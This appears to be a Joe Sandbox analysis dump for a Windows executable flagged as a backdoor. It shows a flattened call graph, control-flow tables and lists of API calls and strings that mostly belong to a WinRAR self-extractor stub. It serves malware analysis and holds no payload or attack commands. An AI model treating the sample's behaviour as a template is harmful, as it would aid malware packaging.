7eec4a DloadUnlock 5 API calls 24293 7fa260 24292->24293 24293->24267 24294->24300 24295 7fa12d MultiByteToWideChar 24296 7fa199 24295->24296 24297 7fa146 24295->24297 24324 7fa2c0 20 API calls _free 24296->24324 24315 7fa72c 24297->24315 24300->24295 24300->24296 24302->24292 24303 7fa1a8 24305 7f8518 __onexit 21 API calls 24303->24305 24308 7fa1c9 __vsnwprintf_l 24303->24308 24304 7fa170 24304->24296 24306 7fa72c __vswprintf_c_l 11 API calls 24304->24306 24305->24308 24306->24296 24307 7fa23e 24323 7fa2c0 20 API calls _free 24307->24323 24308->24307 24309 7fa72c __vswprintf_c_l 11 API calls 24308->24309 24311 7fa21d 24309->24311 24311->24307 24312 7fa22c WideCharToMultiByte 24311->24312 24312->24307 24313 7fa26c 24312->24313 24325 7fa2c0 20 API calls _free 24313->24325 24326 7fa458 24315->24326 24319 7fa79c LCMapStringW 24320 7fa75c 24319->24320 24321 7eec4a DloadUnlock 5 API calls 24320->24321 24322 7fa15d 24321->24322 24322->24296 24322->24303 24322->24304 24323->24296 24324->24302 24325->24296 24327 7fa488 24326->24327 24330 7fa484 24326->24330 24327->24320 24333 7fa7b4 10 API calls 3 library calls 24327->24333 24328 7fa4a8 24328->24327 24331 7fa4b4 GetProcAddress 24328->24331 24330->24327 24330->24328 24334 7fa4f4 24330->24334 24332 7fa4c4 __crt_fast_encode_pointer 24331->24332 24332->24327 24333->24319 24335 7fa515 LoadLibraryExW 24334->24335 24339 7fa50a 24334->24339 24336 7fa54a 24335->24336 24337 7fa532 GetLastError 24335->24337 24336->24339 24340 7fa561 FreeLibrary 24336->24340 24337->24336 24338 7fa53d LoadLibraryExW 24337->24338 24338->24336 24339->24330 24340->24339 24342 7ee360 24341->24342 24343 7e00d9 GetModuleHandleW 24342->24343 24344 7e0154 24343->24344 24345 7e00f0 GetProcAddress 24343->24345 24346 7e0484 GetModuleFileNameW 24344->24346 24449 7f70dd 42 API calls __vsnwprintf_l 24344->24449 24347 7e0109 24345->24347 24348 7e0121 GetProcAddress 24345->24348 24361 7e04a3 24346->24361 24347->24348 24348->24344 24350 7e0133 24348->24350 24350->24344 24351 7e03be 24351->24346 24352 7e03c9 GetModuleFileNameW CreateFileW 24351->24352 24353 7e03fc SetFilePointer 24352->24353 24354 7e0478 CloseHandle 24352->24354 24353->24354 24355 7e040c ReadFile 24353->24355 24354->24346 24355->24354 24358 7e042b 24355->24358 24358->24354 24360 7e0085 2 API calls 24358->24360 24359 7e04d2 CompareStringW 24359->24361 24360->24358 24361->24359 24362 7e0508 GetFileAttributesW 24361->24362 24363 7e0520 24361->24363 24440 7dacf5 24361->24440 24443 7e0085 24361->24443 24362->24361 24362->24363 24364 7e052a 24363->24364 24367 7e0560 24363->24367 24366 7e0542 GetFileAttributesW 24364->24366 24369 7e055a 24364->24369 24365 7e066f 24389 7e9da4 GetCurrentDirectoryW 24365->24389 24366->24364 24366->24369 24367->24365 24368 7dacf5 GetVersionExW 24367->24368 24370 7e057a 24368->24370 24369->24367 24371 7e05e7 24370->24371 24372 7e0581 24370->24372 24373 7d400a _swprintf 51 API calls 24371->24373 24374 7e0085 2 API calls 24372->24374 24375 7e060f AllocConsole 24373->24375 24376 7e058b 24374->24376 24377 7e061c GetCurrentProcessId AttachConsole 24375->24377 24378 7e0667 ExitProcess 24375->24378 24379 7e0085 2 API calls 24376->24379 24450 7f35b3 24377->24450 24381 7e0595 24379->24381 24383 7dddd1 53 API calls 24381->24383 24382 7e063d GetStdHandle WriteConsoleW Sleep FreeConsole 24382->24378 24384 7e05b0 24383->24384 24385 7d400a _swprintf 51 API calls 24384->24385 24386 7e05c3 24385->24386 24387 7dddd1 53 API calls 24386->24387 24388 7e05d2 24387->24388 24388->24378 24389->24088 24391 7e0085 2 API calls 24390->24391 24392 7ea349 OleInitialize 24391->24392 24393 7ea36c GdiplusStartup SHGetMalloc 24392->24393 24393->24090 24395 7e13d7 IsDBCSLeadByte 24394->24395 24395->24395 24396 7e13ef 24395->24396 24396->24092 24398 7ebc8e 24397->24398 24399 7ebda4 24398->24399 24400 7e179d CharUpperW 24398->24400 24452 7decad 80 API calls ___scrt_fastfail 24398->24452 24399->24101 24399->24102 24400->24398 24403 7ee360 24402->24403 24404 7ed294 SetEnvironmentVariableW 24403->24404 24405 7ed2b7 24404->24405 24406 7ed2df 24405->24406 24407 7ed2d3 SetEnvironmentVariableW 24405->24407 24406->24095 24407->24406 24409 7eae0e 24408->24409 24410 7eae15 24408->24410 24453 7e9e1c FindResourceW 24409->24453 24412 7eae2a 24410->24412 24413 7eae1b GetObjectW 24410->24413 24414 7e9d1a 4 API calls 24412->24414 24413->24412 24415 7eae3d 24414->24415 24416 7eae80 24415->24416 24417 7eae5c 24415->24417 24418 7e9e1c 12 API calls 24415->24418 24427 7dd31c 24416->24427 24467 7e9d5a GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24417->24467 24420 7eae4d 24418->24420 24420->24417 24423 7eae53 DeleteObject 24420->24423 24421 7eae64 24468 7e9d39 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24421->24468 24423->24417 24424 7eae6d 24469 7e9f5d 8 API calls ___scrt_fastfail 24424->24469 24426 7eae74 DeleteObject 24426->24416 24478 7dd341 24427->24478 24429 7dd328 24518 7dda4e GetModuleHandleW FindResourceW 24429->24518 24432 7e8835 24433 7ee24a new 8 API calls 24432->24433 24434 7e8854 24433->24434 24434->24114 24436 7ea3cc GdiplusShutdown OleUninitialize 24435->24436 24436->24130 24438->24120 24439->24128 24441 7dad09 GetVersionExW 24440->24441 24442 7dad45 24440->24442 24441->24442 24442->24361 24444 7ee360 24443->24444 24445 7e0092 GetSystemDirectoryW 24444->24445 24446 7e00aa 24445->24446 24447 7e00c8 24445->24447 24448 7e00bb LoadLibraryW 24446->24448 24447->24361 24448->24447 24449->24351 24451 7f35bb 24450->24451 24451->24382 24451->24451 24452->24398 24454 7e9e3e SizeofResource 24453->24454 24455 7e9e70 24453->24455 24454->24455 24456 7e9e52 LoadResource 24454->24456 24455->24410 24456->24455 24457 7e9e63 LockResource 24456->24457 24457->24455 24458 7e9e77 GlobalAlloc 24457->24458 24458->24455 24459 7e9e92 GlobalLock 24458->24459 24460 7e9f21 GlobalFree 24459->24460 24461 7e9ea1 __vswprintf_c_l 24459->24461 24460->24455 24462 7e9f1a GlobalUnlock 24461->24462 24470 7e9d7b GdipAlloc 24461->24470 24462->24460 24465 7e9eef GdipCreateHBITMAPFromBitmap 24466 7e9f05 24465->24466 24466->24462 24467->24421 24468->24424 24469->24426 24471 7e9d9a 24470->24471 24472 7e9d8d 24470->24472 24471->24462 24471->24465 24471->24466 24474 7e9b0f 24472->24474 24475 7e9b37 GdipCreateBitmapFromStream 24474->24475 24476 7e9b30 GdipCreateBitmapFromStreamICM 24474->24476 24477 7e9b3c 24475->24477 24476->24477 24477->24471 24479 7dd34b _wcschr __EH_prolog 24478->24479 24480 7dd37a GetModuleFileNameW 24479->24480 24481 7dd3ab 24479->24481 24482 7dd394 24480->24482 24520 7d99b0 24481->24520 24482->24481 24484 7d9653 79 API calls 24487 7dd7ab 24484->24487 24485 7dd407 24531 7f5a90 26 API calls 3 library calls 24485->24531 24487->24429 24488 7e3781 76 API calls 24490 7dd3db 24488->24490 24489 7dd41a 24532 7f5a90 26 API calls 3 library calls 24489->24532 24490->24485 24490->24488 24503 7dd627 24490->24503 24492 7dd563 24492->24503 24550 7d9d30 77 API calls 24492->24550 24496 7dd57d ___std_exception_copy 24497 7d9bf0 80 API calls 24496->24497 24496->24503 24500 7dd5a6 ___std_exception_copy 24497->24500 24499 7dd42c 24499->24492 24499->24503 24533 7d9e40 24499->24533 24541 7d9bf0 24499->24541 24549 7d9d30 77 API calls 24499->24549 24502 7dd5b2 ___std_exception_copy 24500->24502 24500->24503 24551 7e137a MultiByteToWideChar 24500->24551 24502->24503 24504 7dd72b 24502->24504 24507 7dda0a 24502->24507 24509 7dd9fa 24502->24509 24515 7e1596 WideCharToMultiByte 24502->24515 24555 7ddd6b 50 API calls __vsnprintf 24502->24555 24556 7f58d9 26 API calls 3 library calls 24502->24556 24503->24484 24552 7dce72 76 API calls 24504->24552 24506 7dd742 24510 7dd771 24506->24510 24512 7e3781 76 API calls 24506->24512 24557 7dce72 76 API calls 24507->24557 24509->24429 24553 7f5a90 26 API calls 3 library calls 24510->24553 24512->24506 24513 7dd78b 24554 7f5a90 26 API calls 3 library calls 24513->24554 24515->24502 24519 7dd32f 24518->24519 24519->24432 24521 7d99ba 24520->24521 24522 7d9a39 CreateFileW 24521->24522 24523 7d9a59 GetLastError 24522->24523 24524 7d9aaa 24522->24524 24525 7db66c 2 API calls 24523->24525 24526 7d9ae1 24524->24526 24528 7d9ac7 SetFileTime 24524->24528 24527 7d9a79 24525->24527 24526->24490 24527->24524 24529 7d9a7d CreateFileW GetLastError 24527->24529 24528->24526 24530 7d9aa1 24529->24530 24530->24524 24531->24489 24532->24499 24534 7d9e64 SetFilePointer 24533->24534 24535 7d9e53 24533->24535 24536 7d9e9d 24534->24536 24537 7d9e82 GetLastError 24534->24537 24535->24536 24558 7d6fa5 75 API calls 24535->24558 24536->24499 24537->24536 24539 7d9e8c 24537->24539 24539->24536 24559 7d6fa5 75 API calls 24539->24559 24542 7d9bfc 24541->24542 24545 7d9c03 24541->24545 24542->24499 24544 7d9c9e 24544->24542 24572 7d6f6b 75 API calls 24544->24572 24545->24542 24545->24544 24547 7d9cc0 24545->24547 24560 7d984e 24545->24560 24547->24542 24548 7d984e 5 API calls 24547->24548 24548->24547 24549->24499 24550->24496 24551->24502 24552->24506 24553->24513 24554->24503 24555->24502 24556->24502 24557->24509 24558->24534 24559->24536 24561 7d985c GetStdHandle 24560->24561 24562 7d9867 ReadFile 24560->24562 24561->24562 24563 7d9880 24562->24563 24568 7d98a0 24562->24568 24564 7d9989 GetFileType 24563->24564 24565 7d9887 24564->24565 24566 7d98a8 GetLastError 24565->24566 24567 7d98b7 24565->24567 24569 7d9895 24565->24569 24566->24567 24566->24568 24567->24568 24570 7d98c7 GetLastError 24567->24570 24568->24545 24571 7d984e GetFileType 24569->24571 24570->24568 24570->24569 24571->24568 24572->24542 24574 7f7430 FindHandlerForForeignException 24573->24574 24575 7f7448 24574->24575 24576 7f757e _abort GetModuleHandleW 24574->24576 24595 7fa3f1 EnterCriticalSection 24575->24595 24578 7f743c 24576->24578 24578->24575 24607 7f75c2 GetModuleHandleExW 24578->24607 24579 7f74ee 24596 7f752e 24579->24596 24582 7f7450 24582->24579 24584 7f74c5 24582->24584 24615 7f7f30 20 API calls _abort 24582->24615 24587 7f74dd 24584->24587 24592 7f81f1 _abort 5 API calls 24584->24592 24585 7f750b 24599 7f753d 24585->24599 24586 7f7537 24616 801a19 5 API calls DloadUnlock 24586->24616 24588 7f81f1 _abort 5 API calls 24587->24588 24588->24579 24592->24587 24595->24582 24617 7fa441 LeaveCriticalSection 24596->24617 24598 7f7507 24598->24585 24598->24586 24618 7fa836 24599->24618 24602 7f756b 24605 7f75c2 _abort 8 API calls 24602->24605 24603 7f754b GetPEB 24603->24602 24604 7f755b GetCurrentProcess TerminateProcess 24603->24604 24604->24602 24606 7f7573 ExitProcess 24605->24606 24608 7f760f 24607->24608 24609 7f75ec GetProcAddress 24607->24609 24610 7f761e 24608->24610 24611 7f7615 FreeLibrary 24608->24611 24614 7f7601 24609->24614 24612 7eec4a DloadUnlock 5 API calls 24610->24612 24611->24610 24613 7f7628 24612->24613 24613->24575 24614->24608 24615->24584 24617->24598 24619 7fa85b 24618->24619 24623 7fa851 24618->24623 24620 7fa458 __dosmaperr 5 API calls 24619->24620 24620->24623 24621 7eec4a DloadUnlock 5 API calls 24622 7f7547 24621->24622 24622->24602 24622->24603 24623->24621 24883 7eacd0 100 API calls 24935 7e19d0 26 API calls std::bad_exception::bad_exception 24884 7ea8c2 GetDlgItem EnableWindow ShowWindow SendMessageW 24886 7eeac0 27 API calls pre_c_initialization 24939 7febc1 21 API calls __vswprintf_c_l 24940 7e97c0 10 API calls 24888 7f9ec0 21 API calls 24941 7fb5c0 GetCommandLineA GetCommandLineW 24889 800040 IsProcessorFeaturePresent 24635 7f76bd 24636 7f76cc 24635->24636 24637 7f76e8 24635->24637 24636->24637 24639 7f76d2 24636->24639 24638 7fb290 51 API calls 24637->24638 24640 7f76ef GetModuleFileNameA 24638->24640 24658 7f895a 20 API calls __dosmaperr 24639->24658 24642 7f7713 24640->24642 24660 7f77e1 38 API calls 24642->24660 24643 7f76d7 24659 7f8839 26 API calls ___std_exception_copy 24643->24659 24645 7f76e1 24647 7f7730 24661 7f7956 20 API calls 2 library calls 24647->24661 24649 7f773d 24650 7f7746 24649->24650 24651 7f7752 24649->24651 24662 7f895a 20 API calls __dosmaperr 24650->24662 24663 7f77e1 38 API calls 24651->24663 24654 7f7768 24656 7f84de _free 20 API calls 24654->24656 24657 7f774b 24654->24657 24655 7f84de _free 20 API calls 24655->24645 24656->24657 24657->24655 24658->24643 24659->24645 24660->24647 24661->24649 24662->24657 24663->24654 24666 7f79b7 24667 7fb290 51 API calls 24666->24667 24668 7f79c9 24667->24668 24677 7fb610 GetEnvironmentStringsW 24668->24677 24671 7f79d4 24673 7f84de _free 20 API calls 24671->24673 24674 7f7a09 24673->24674 24675 7f79df 24676 7f84de _free 20 API calls 24675->24676 24676->24671 24678 7fb627 24677->24678 24688 7fb67a 24677->24688 24681 7fb62d WideCharToMultiByte 24678->24681 24679 7f79ce 24679->24671 24689 7f7a0f 26 API calls 3 library calls 24679->24689 24680 7fb683 FreeEnvironmentStringsW 24680->24679 24682 7fb649 24681->24682 24681->24688 24683 7f8518 __onexit 21 API calls 24682->24683 24684 7fb64f 24683->24684 24685 7fb656 WideCharToMultiByte 24684->24685 24686 7fb66c 24684->24686 24685->24686 24687 7f84de _free 20 API calls 24686->24687 24687->24688 24688->24679 24688->24680 24689->24675 24891 7d16b0 84 API calls 24690 7f90b0 24698 7fa56f 24690->24698 24694 7f90d9 24695 7f90cc 24695->24694 24706 7f90e0 11 API calls 24695->24706 24697 7f90c4 24699 7fa458 __dosmaperr 5 API calls 24698->24699 24700 7fa596 24699->24700 24701 7fa5ae TlsAlloc 24700->24701 24702 7fa59f 24700->24702 24701->24702 24703 7eec4a DloadUnlock 5 API calls 24702->24703 24704 7f90ba 24703->24704 24704->24697 24705 7f9029 20 API calls 2 library calls 24704->24705 24705->24695 24706->24697 24707 7fa3b0 24708 7fa3bb 24707->24708 24710 7fa3e4 24708->24710 24712 7fa3e0 24708->24712 24713 7fa6ca 24708->24713 24720 7fa410 DeleteCriticalSection 24710->24720 24714 7fa458 __dosmaperr 5 API calls 24713->24714 24715 7fa6f1 24714->24715 24716 7fa70f InitializeCriticalSectionAndSpinCount 24715->24716 24717 7fa6fa 24715->24717 24716->24717 24718 7eec4a DloadUnlock 5 API calls 24717->24718 24719 7fa726 24718->24719 24719->24708 24720->24712 24892 7f1eb0 6 API calls 3 library calls 24893 7ee4a2 38 API calls 2 library calls 24895 7d96a0 79 API calls 24944 7fe9a0 51 API calls 24898 7ea89d 78 API calls 24899 7dea98 FreeLibrary 24945 7f2397 48 API calls 24743 7ed997 24744 7ed89b 24743->24744 24745 7edf59 ___delayLoadHelper2@8 19 API calls 24744->24745 24745->24744 24901 7e7090 114 API calls 24902 7ecc90 70 API calls 24946 7ea990 97 API calls 24947 7e9b90 GdipCloneImage GdipAlloc 24748 7ed891 19 API calls ___delayLoadHelper2@8 24948 7f9b90 21 API calls 2 library calls 24814 7d1385 82 API calls 3 library calls 24905 7fac0e 27 API calls DloadUnlock 24951 7f5780 QueryPerformanceFrequency QueryPerformanceCounter

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 007E00CF: GetModuleHandleW.KERNEL32(kernel32), ref: 007E00E4
                                                  • Part of subcall function 007E00CF: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 007E00F6
                                                  • Part of subcall function 007E00CF: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 007E0127
                                                  • Part of subcall function 007E9DA4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 007E9DAC
                                                  • Part of subcall function 007EA335: OleInitialize.OLE32(00000000), ref: 007EA34E
                                                  • Part of subcall function 007EA335: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 007EA385
                                                  • Part of subcall function 007EA335: SHGetMalloc.SHELL32(00818430), ref: 007EA38F
                                                  • Part of subcall function 007E13B3: GetCPInfo.KERNEL32(00000000,?), ref: 007E13C4
                                                  • Part of subcall function 007E13B3: IsDBCSLeadByte.KERNEL32(00000000), ref: 007E13D8
                                                • GetCommandLineW.KERNEL32 ref: 007ED61C
                                                • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 007ED643
                                                • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 007ED654
                                                • UnmapViewOfFile.KERNEL32(00000000), ref: 007ED68E
                                                  • Part of subcall function 007ED287: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 007ED29D
                                                  • Part of subcall function 007ED287: SetEnvironmentVariableW.KERNELBASE(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 007ED2D9
                                                • CloseHandle.KERNEL32(00000000), ref: 007ED697
                                                • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe,00000800), ref: 007ED6B2
                                                • SetEnvironmentVariableW.KERNELBASE(sfxname,C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe), ref: 007ED6BE
                                                • GetLocalTime.KERNEL32(?), ref: 007ED6C9
                                                • _swprintf.LIBCMT ref: 007ED708
                                                • SetEnvironmentVariableW.KERNELBASE(sfxstime,?), ref: 007ED71A
                                                • GetModuleHandleW.KERNEL32(00000000), ref: 007ED721
                                                • LoadIconW.USER32(00000000,00000064), ref: 007ED738
                                                • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001AEE0,00000000), ref: 007ED789
                                                • Sleep.KERNEL32(?), ref: 007ED7B7
                                                • DeleteObject.GDI32 ref: 007ED7F0
                                                • DeleteObject.GDI32(?), ref: 007ED800
                                                • CloseHandle.KERNEL32 ref: 007ED843
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
                                                • API String ID: 788466649-2343999045
                                                • Opcode ID: f155a52fdd05bde8f568d6676ac87085970f69f3fb1a9dce0bc39e20dba7815c
                                                • Instruction ID: b7a86d8f4647f7bd99585f7fea925e5c48d77fc0d36b2e5874c9681a13e05bb1
                                                • Opcode Fuzzy Hash: f155a52fdd05bde8f568d6676ac87085970f69f3fb1a9dce0bc39e20dba7815c
                                                • Instruction Fuzzy Hash: DF61A071901391EFD370ABA6EC4AA6A3BACFF48740F004429F545D22A1DFBC9D44CB66
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 770 7e9e1c-7e9e38 FindResourceW 771 7e9e3e-7e9e50 SizeofResource 770->771 772 7e9f2f-7e9f32 770->772 773 7e9e52-7e9e61 LoadResource 771->773 774 7e9e70-7e9e72 771->774 773->774 775 7e9e63-7e9e6e LockResource 773->775 776 7e9f2e 774->776 775->774 777 7e9e77-7e9e8c GlobalAlloc 775->777 776->772 778 7e9f28-7e9f2d 777->778 779 7e9e92-7e9e9b GlobalLock 777->779 778->776 780 7e9f21-7e9f22 GlobalFree 779->780 781 7e9ea1-7e9ebf call 7ef4b0 779->781 780->778 785 7e9f1a-7e9f1b GlobalUnlock 781->785 786 7e9ec1-7e9ee3 call 7e9d7b 781->786 785->780 786->785 791 7e9ee5-7e9eed 786->791 792 7e9eef-7e9f03 GdipCreateHBITMAPFromBitmap 791->792 793 7e9f08-7e9f16 791->793 792->793 794 7e9f05 792->794 793->785 794->793
                                                APIs
                                                • FindResourceW.KERNEL32(007EAE4D,PNG,?,?,?,007EAE4D,00000066), ref: 007E9E2E
                                                • SizeofResource.KERNEL32(00000000,00000000,?,?,?,007EAE4D,00000066), ref: 007E9E46
                                                • LoadResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E59
                                                • LockResource.KERNEL32(00000000,?,?,?,007EAE4D,00000066), ref: 007E9E64
                                                • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,007EAE4D,00000066), ref: 007E9E82
                                                • GlobalLock.KERNEL32(00000000,?,?,?,?,?,007EAE4D,00000066), ref: 007E9E93
                                                • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 007E9EFC
                                                • GlobalUnlock.KERNEL32(00000000), ref: 007E9F1B
                                                • GlobalFree.KERNEL32(00000000), ref: 007E9F22
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
                                                • String ID: PNG
                                                • API String ID: 4097654274-364855578
                                                • Opcode ID: 95174eb4e536c6a90e730211c88f034fc68c2657161c3cb85985a62c8b8366c4
                                                • Instruction ID: 0e70d99596062a49609ac3f09731c52490d254e43a41fbe403705331c1d5b968
                                                • Opcode Fuzzy Hash: 95174eb4e536c6a90e730211c88f034fc68c2657161c3cb85985a62c8b8366c4
                                                • Instruction Fuzzy Hash: 2C31A272205746AFC7119F62DC4896BBFADFF8D751B044518FA02D2260EB75DC00CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1010 7da5f4-7da61f call 7ee360 1013 7da691-7da69a FindNextFileW 1010->1013 1014 7da621-7da632 FindFirstFileW 1010->1014 1015 7da69c-7da6aa GetLastError 1013->1015 1016 7da6b0-7da6b2 1013->1016 1017 7da6b8-7da75c call 7dfe56 call 7dbcfb call 7e0e19 * 3 1014->1017 1018 7da638-7da64f call 7db66c 1014->1018 1015->1016 1016->1017 1019 7da761-7da774 1016->1019 1017->1019 1025 7da66a-7da673 GetLastError 1018->1025 1026 7da651-7da668 FindFirstFileW 1018->1026 1028 7da675-7da678 1025->1028 1029 7da684 1025->1029 1026->1017 1026->1025 1028->1029 1032 7da67a-7da67d 1028->1032 1030 7da686-7da68c 1029->1030 1030->1019 1032->1029 1033 7da67f-7da682 1032->1033 1033->1030
                                                APIs
                                                • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA628
                                                • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA65E
                                                • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA66A
                                                • FindNextFileW.KERNEL32(?,?,?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA692
                                                • GetLastError.KERNEL32(?,?,?,?,007DA4EF,000000FF,?,?), ref: 007DA69E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: FileFind$ErrorFirstLast$Next
                                                • String ID:
                                                • API String ID: 869497890-0
                                                • Opcode ID: 973e3793189f193660fea2e834e077707a1731b878f8ec53e9c2a506bc789a11
                                                • Instruction ID: 89efc1d0625645b9aa92bda550c31085dd11d5e7859f7ed111b3f580e52eca00
                                                • Opcode Fuzzy Hash: 973e3793189f193660fea2e834e077707a1731b878f8ec53e9c2a506bc789a11
                                                • Instruction Fuzzy Hash: D9416072505681EFC324EF78C884ADAF7F8BF48350F040A2AF599D3250D778A9548B92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetCurrentProcess.KERNEL32(00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002,00000000), ref: 007F755E
                                                • TerminateProcess.KERNEL32(00000000,?,007F7513,00000000,0080BAD8,0000000C,007F766A,00000000,00000002,00000000), ref: 007F7565
                                                • ExitProcess.KERNEL32 ref: 007F7577
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1636021909.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                • Associated: 00000000.00000002.1636004707.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636053941.0000000000803000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000080E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000814000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000825000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.000000000082D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636073023.0000000000831000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1636165747.0000000000832000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_7d0000_HEUR-Backdoor.jbxd
                                                Similarity
                                                • API ID: Process$CurrentExitTerminate
                                                • String ID:
                                                • API String ID: 1703294689-0
                                                • Opcode ID: e04f8a80133179e156dbe446f858ebcbd3ba08af8c44c95328a43878392bb289
                                                • Instruction ID: 84f2e77e220a922572997347595ad2b4862c0bfc403496928858da07fa7c03b9
                                                • Opcode Fuzzy Hash: e04f8a80133179e156dbe446f858ebcbd3ba08af8c44c95328a43878392bb289
                                                • Instruction Fuzzy Hash: C1E0B631005A48EBDF55AF64DD0DA693B69FB44781F108414FA098B322CB39DE52DA90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
